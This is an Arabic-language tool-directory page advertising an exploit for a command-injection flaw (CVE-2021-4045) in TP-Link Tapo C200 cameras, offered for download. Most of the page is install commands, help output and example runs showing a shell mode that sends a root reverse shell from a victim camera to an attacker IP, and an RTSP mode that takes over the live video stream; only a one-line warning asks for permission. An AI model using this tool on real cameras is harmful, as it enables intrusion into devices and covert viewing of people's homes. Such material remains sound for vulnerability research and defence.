Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-4045 — 🔐 "PWNTAPO: كشف عن حقن الأوامر في كاميرات TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓 | Kitploit
أدوات/GitHubGitHub/0xbinder/cve-2021-4045
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالالقيادة والسيطرةأمان الأجهزة وإنترنت الأشياءأداة الوصول عن بعد
GitHub0xbinder/cve-2021-4045

CVE-2021-4045

🔐 "PWNTAPO: كشف عن حقن الأوامر في كاميرات TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓

عرض المستودع
9214منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

TP-Link Tapo c200 1.1.15 - تنفيذ الأوامر عن بعد (RCE) (CVE-2021-4045)

🔐 "PWNTAPO: كشف حقن الأوامر في كاميرات TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓

اقرأ عن الثغرة من exploit db

هذه ثغرة حقن أوامر تؤثر على جميع إصدارات البرامج الثابتة لكاميرات TP-Link Tapo c200 الأقل من 1.1.16 Build 211209 Rel. 37726N. لقراءة المزيد عن كيفية عمل الثغرة، اقرأ هذا المقال من hacefresko

التثبيت

root@kitploit:~
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h

الاستخدام

root@kitploit:~
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)

الثغرة لها وضعان: SHELL و RSTP.

وضع SHELL

في وضع shell، تحتاج فقط إلى توفير عنوان IP للضحية وعنوان IP للمهاجم ومنفذ الاستماع، وسيؤدي ذلك إلى فتح قشرة جذر (root shell) على الجهاز.

root@kitploit:~
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887

وضع RSTP

في وضع RSTP، ستحتاج إلى توفير RSTP_USER و PASSWORD و CIPHERTEXT لتتمكن من الحصول على بث مباشر من الكاميرا.

root@kitploit:~
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...

تحذير: لا تقم بتشغيل الأداة على أجهزة دون إذن المستخدم

تنزيل الأداة